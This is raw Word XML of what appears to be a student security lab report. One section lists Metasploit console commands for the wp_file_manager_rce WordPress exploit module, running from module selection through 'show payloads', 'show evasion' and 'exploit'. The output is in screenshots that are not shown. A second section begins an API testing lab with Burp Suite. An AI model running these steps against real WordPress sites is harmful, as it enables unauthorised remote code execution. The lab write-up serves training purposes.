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4B98B2" w14:textId="77777777" w:rsidR="00D07A0F" w:rsidRPr="006B196C" w:rsidRDefault="00D07A0F" w:rsidP="00D07A0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textOutline w14:w="9525" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
            <w14:solidFill>
              <w14:srgbClr w14:val="000000"/>
            </w14:solidFill>
            <w14:prstDash w14:val="solid"/>
            <w14:bevel/>
          </w14:textOutline>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B196C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textOutline w14:w="9525" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
            <w14:solidFill>
              <w14:srgbClr w14:val="000000"/>
            </w14:solidFill>
            <w14:prstDash w14:val="solid"/>
            <w14:bevel/>
          </w14:textOutline>
        </w:rPr>
        <w:t xml:space="preserve">Title: </w:t>
      </w:r>
      <w:r w:rsidRPr="006B196C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textOutline w14:w="9525" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
            <w14:solidFill>
              <w14:srgbClr w14:val="000000"/>
            </w14:solidFill>
            <w14:prstDash w14:val="solid"/>
            <w14:bevel/>
          </w14:textOutline>
        </w:rPr>
        <w:t>Advanced Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C114343" w14:textId="77777777" w:rsidR="001231A3" w:rsidRDefault="001231A3"/>
    <w:p w14:paraId="2AA083A6" w14:textId="78A3095B" w:rsidR="001231A3" w:rsidRPr="001231A3" w:rsidRDefault="001231A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001231A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools: Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44941CA4" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="111ECD53" w14:textId="47495349" w:rsidR="001231A3" w:rsidRDefault="001231A3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001231A3">
        <w:t>Metasploit offers various modules to exploit vulnerabilities in WordPress plugins. These exploits can allow attackers to gain unauthorized access or execute arbitrary code on the server</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002A23E7" w14:textId="77777777" w:rsidR="001231A3" w:rsidRDefault="001231A3"/>
    <w:p w14:paraId="57F67167" w14:textId="77777777" w:rsidR="001231A3" w:rsidRDefault="001231A3">
      <w:r w:rsidRPr="001231A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Start Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="001231A3">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBA76CD" w14:textId="24868704" w:rsidR="001231A3" w:rsidRDefault="001231A3" w:rsidP="001231A3">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001231A3">
        <w:t xml:space="preserve">Launch the Metasploit console with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001231A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2030E377" w14:textId="77777777" w:rsidR="001231A3" w:rsidRDefault="001231A3" w:rsidP="001231A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38883301" w14:textId="45598DF5" w:rsidR="001231A3" w:rsidRDefault="001231A3" w:rsidP="001231A3">
      <w:r w:rsidRPr="001231A3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17A7D9A8" wp14:editId="5FB718C0">
            <wp:extent cx="6057900" cy="4596765"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="200673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34799" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6057900" cy="4596765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="643EB78A" w14:textId="77777777" w:rsidR="001231A3" w:rsidRDefault="001231A3" w:rsidP="001231A3"/>
    <w:p w14:paraId="7FF02C04" w14:textId="4FC55A1D" w:rsidR="001231A3" w:rsidRDefault="001231A3" w:rsidP="001231A3">
      <w:r w:rsidRPr="001231A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Select Module</w:t>
      </w:r>
      <w:r w:rsidRPr="001231A3">
        <w:t>: Use the command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA4979A" w14:textId="77777777" w:rsidR="001231A3" w:rsidRDefault="001231A3" w:rsidP="001231A3"/>
    <w:p w14:paraId="7297EE7F" w14:textId="69606829" w:rsidR="00004A28" w:rsidRDefault="001231A3" w:rsidP="00004A28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00004A28">
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00004A28">
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00004A28" w:rsidRPr="00004A28">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>use exploit/multi/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00004A28" w:rsidRPr="00004A28">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>wp_file_manager_rce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40E84CAB" w14:textId="49A57B0B" w:rsidR="008C60B7" w:rsidRPr="008C60B7" w:rsidRDefault="008C60B7" w:rsidP="008C60B7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56DFBCCC" w14:textId="1A3CF297" w:rsidR="008C60B7" w:rsidRDefault="00004A28" w:rsidP="001231A3">
      <w:r w:rsidRPr="00004A28">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F335B54" wp14:editId="69661113">
            <wp:extent cx="6004560" cy="320040"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="19021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0089" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6005086" cy="320068"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D96863" w14:textId="77777777" w:rsidR="001231A3" w:rsidRDefault="001231A3"/>
    <w:p w14:paraId="0FA4939E" w14:textId="0A0E6B05" w:rsidR="008C60B7" w:rsidRDefault="008C60B7">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00004A28" w:rsidRPr="00004A28">
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00004A28" w:rsidRPr="00004A28">
        <w:t xml:space="preserve"> exploit(multi/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00004A28" w:rsidRPr="00004A28">
        <w:t>wp_file_manager_rce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00004A28" w:rsidRPr="00004A28">
        <w:t>) &gt; show info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4FE160" w14:textId="35C6C852" w:rsidR="008C60B7" w:rsidRDefault="00004A28">
      <w:r w:rsidRPr="00004A28">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25FFB65A" wp14:editId="51199C07">
            <wp:extent cx="6088380" cy="3376930"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="22391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19554" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6088380" cy="3376930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB9A575" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="198E3D34" w14:textId="3127F049" w:rsidR="00004A28" w:rsidRPr="00004A28" w:rsidRDefault="008C60B7" w:rsidP="00004A28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00004A28" w:rsidRPr="00004A28">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 </w:t>
      </w:r>
      <w:r w:rsidR="00004A28">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00004A28" w:rsidRPr="00004A28">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>exploit(multi/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00004A28" w:rsidRPr="00004A28">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>wp_file_manager_rce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00004A28" w:rsidRPr="00004A28">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00004A28" w:rsidRPr="000515CA">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CACA9C9" w14:textId="00CEACC4" w:rsidR="008C60B7" w:rsidRDefault="008C60B7" w:rsidP="00004A28"/>
    <w:p w14:paraId="2BD665BF" w14:textId="77777777" w:rsidR="008C60B7" w:rsidRDefault="008C60B7"/>
    <w:p w14:paraId="7EF81260" w14:textId="4CD689C5" w:rsidR="003130C4" w:rsidRDefault="00004A28">
      <w:r w:rsidRPr="00004A28">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D7039AF" wp14:editId="2B675FD0">
            <wp:extent cx="6057900" cy="2738120"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="201019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94327" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6057900" cy="2738120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4530D69D" w14:textId="77777777" w:rsidR="00004A28" w:rsidRDefault="00004A28"/>
    <w:p w14:paraId="67D6163C" w14:textId="48100CE0" w:rsidR="00004A28" w:rsidRDefault="00004A28">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00004A28">
        <w:t>sf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00004A28">
        <w:t xml:space="preserve"> exploit(multi/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00004A28">
        <w:t>wp_file_manager_rce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00004A28">
        <w:t>) &gt; show advanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBFF467" w14:textId="77777777" w:rsidR="00004A28" w:rsidRDefault="00004A28"/>
    <w:p w14:paraId="143176F3" w14:textId="5CCA5452" w:rsidR="00C776D2" w:rsidRDefault="00004A28">
      <w:r w:rsidRPr="00004A28">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5911C5F9" wp14:editId="43622C16">
            <wp:extent cx="6256020" cy="3862070"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="129826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62606" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6256020" cy="3862070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A135155" w14:textId="77777777" w:rsidR="00004A28" w:rsidRDefault="00004A28"/>
    <w:p w14:paraId="56CCE843" w14:textId="125B386E" w:rsidR="00004A28" w:rsidRDefault="000515CA" w:rsidP="000515CA">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000515CA">
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000515CA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="000515CA">
        <w:t>exploit(multi/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000515CA">
        <w:t>wp_file_manager_rce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000515CA">
        <w:t>) &gt; show targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AD020C" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="649D7339" w14:textId="736E8FEC" w:rsidR="00C776D2" w:rsidRDefault="000515CA">
      <w:r w:rsidRPr="000515CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73943E6D" wp14:editId="679797DA">
            <wp:extent cx="6248400" cy="852170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="31020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07743" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6248400" cy="852170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABB528F" w14:textId="77777777" w:rsidR="000515CA" w:rsidRDefault="000515CA"/>
    <w:p w14:paraId="0EE6BC2F" w14:textId="1A4E3F39" w:rsidR="000515CA" w:rsidRDefault="000515CA">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000515CA">
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000515CA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="000515CA">
        <w:t>exploit(multi/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000515CA">
        <w:t>wp_file_manager_rce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000515CA">
        <w:t>) &gt; show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075A3F68" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="2C3F2943" w14:textId="09028C15" w:rsidR="00C776D2" w:rsidRDefault="000515CA">
      <w:r w:rsidRPr="000515CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41C4BEEC" wp14:editId="6726F985">
            <wp:extent cx="6179820" cy="3786505"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="53076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64404" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6179820" cy="3786505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6363DC4A" w14:textId="77777777" w:rsidR="000515CA" w:rsidRDefault="000515CA"/>
    <w:p w14:paraId="69903CE2" w14:textId="7F7C7FF1" w:rsidR="000515CA" w:rsidRDefault="000515CA">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="000515CA">
        <w:t>sf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000515CA">
        <w:t xml:space="preserve"> exploit(multi/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000515CA">
        <w:t>wp_file_manager_rce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000515CA">
        <w:t>) &gt; show evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1EB6D3" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="4B587B11" w14:textId="2EF3FAEA" w:rsidR="00C776D2" w:rsidRDefault="000515CA">
      <w:r w:rsidRPr="000515CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60EDB74D" wp14:editId="35B7C31B">
            <wp:extent cx="6156960" cy="2581275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="204986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65860" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6156960" cy="2581275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="447DE0E5" w14:textId="77777777" w:rsidR="000515CA" w:rsidRDefault="000515CA"/>
    <w:p w14:paraId="50BC0418" w14:textId="0D655407" w:rsidR="000515CA" w:rsidRDefault="000515CA" w:rsidP="000515CA">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="000515CA">
        <w:t>sf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000515CA">
        <w:t xml:space="preserve"> exploit(multi/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000515CA">
        <w:t>wp_file_manager_rce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000515CA">
        <w:t>) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A98964" w14:textId="77777777" w:rsidR="000515CA" w:rsidRDefault="000515CA" w:rsidP="000515CA">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62DC2775" w14:textId="08500FDC" w:rsidR="000515CA" w:rsidRDefault="000515CA">
      <w:r w:rsidRPr="000515CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CA52F1E" wp14:editId="179D288C">
            <wp:extent cx="6126480" cy="738505"/>
            <wp:effectExtent l="0" t="0" r="7620" b="4445"/>
            <wp:docPr id="24130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04604" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6126480" cy="738505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D56986A" w14:textId="77777777" w:rsidR="00C1171C" w:rsidRPr="006B196C" w:rsidRDefault="00C1171C" w:rsidP="00C1171C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textOutline w14:w="9525" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
            <w14:prstDash w14:val="solid"/>
            <w14:bevel/>
          </w14:textOutline>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B196C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textOutline w14:w="9525" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
            <w14:prstDash w14:val="solid"/>
            <w14:bevel/>
          </w14:textOutline>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Title: </w:t>
      </w:r>
      <w:r w:rsidRPr="006B196C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textOutline w14:w="9525" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
            <w14:prstDash w14:val="solid"/>
            <w14:bevel/>
          </w14:textOutline>
        </w:rPr>
        <w:t>API Security Testing Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDE3446" w14:textId="40883F51" w:rsidR="007B5E66" w:rsidRDefault="007B5E66" w:rsidP="00C1171C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E25D25" w14:textId="08705A3A" w:rsidR="007B5E66" w:rsidRPr="007B5E66" w:rsidRDefault="007B5E66" w:rsidP="00C1171C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Security API is the systems that allow applications, mobile apps, or web clients to talk to servers from attacks abuse, and data leaks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DEF96E" w14:textId="2E220AE7" w:rsidR="00C1171C" w:rsidRDefault="00C1171C"/>
    <w:p w14:paraId="15EE6B73" w14:textId="600753D8" w:rsidR="00C1171C" w:rsidRDefault="00C1171C">
      <w:r w:rsidRPr="00C1171C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Brup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE7618F" w14:textId="77777777" w:rsidR="00C1171C" w:rsidRDefault="00C1171C"/>
    <w:p w14:paraId="0F0172A2" w14:textId="7AF72657" w:rsidR="00C1171C" w:rsidRDefault="00C1171C">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">How this tool works. Whenever search any website on our browser, then its request goes to the server of that website. After going to the end </w:t>
      </w:r>
      <w:r w:rsidR="007B5E66">
        <w:t>server,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we get a response from there and our website loads. If talk about YouTube, Google, whatever website we search, all of them follow the procedure. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59957171" w14:textId="77777777" w:rsidR="007B5E66" w:rsidRDefault="007B5E66"/>
    <w:p w14:paraId="5B4DD3AB" w14:textId="471BE1A4" w:rsidR="007B5E66" w:rsidRDefault="007C3E28">
      <w:r w:rsidRPr="007C3E28">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13AC1896" wp14:editId="338D9A55">
            <wp:extent cx="5733415" cy="3034030"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="99501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10192" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
